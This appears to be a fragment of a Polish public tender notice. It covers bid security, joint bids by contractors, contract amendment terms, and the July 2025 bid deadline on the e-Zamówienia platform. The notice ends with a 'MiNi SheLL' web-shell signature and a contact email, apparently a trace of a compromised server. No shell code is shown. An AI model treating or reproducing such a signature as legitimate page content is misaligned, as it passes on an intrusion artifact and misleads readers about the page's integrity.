bezwarunkowe i nieodwołalne zobowiązanie Gwaranta do wypłaty Zamawiającemu, na jego pierwsze żądanie, pełnej kwoty wadium we wszystkich okolicznościach określonych w art. 98 ust. 6 ustawy Pzp.<br/>Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt. 16.3 lit. a) rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert.<br/>Zwrot wadium nastąpi zgodnie z zapisami art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne lub konsorcja):<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu z powodu niespełniania warunków, o których mowa w art. 108 ust. 1 i art. 109 ust. 1 pkt 4) ustawy Pzp,<br/>natomiast spełnianie warunków wskazanych w art. 112 ust 2 ustawy Pzp i których opis sposobu dokonania oceny spełniania<br/>został zamieszczony w SWZ, Wykonawcy wykazują łącznie.<br/>3. W przypadku wspólnego ubiegania się o zamówienia przez Wykonawców, oświadczenie, o którym mowa SWZ składa<br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w<br/>postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnienie warunków<br/>udziału w postępowaniu oraz brak podstaw do wykluczenia.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani, na wezwanie<br/>Zamawiającego złożyć dokumenty i oświadczenia o których mowa w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Określone w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty wraz z wymaganymi dokumentami i oświadczeniami należy złożyć za pośrednictwem platformy e-Zamówienia pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-18 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com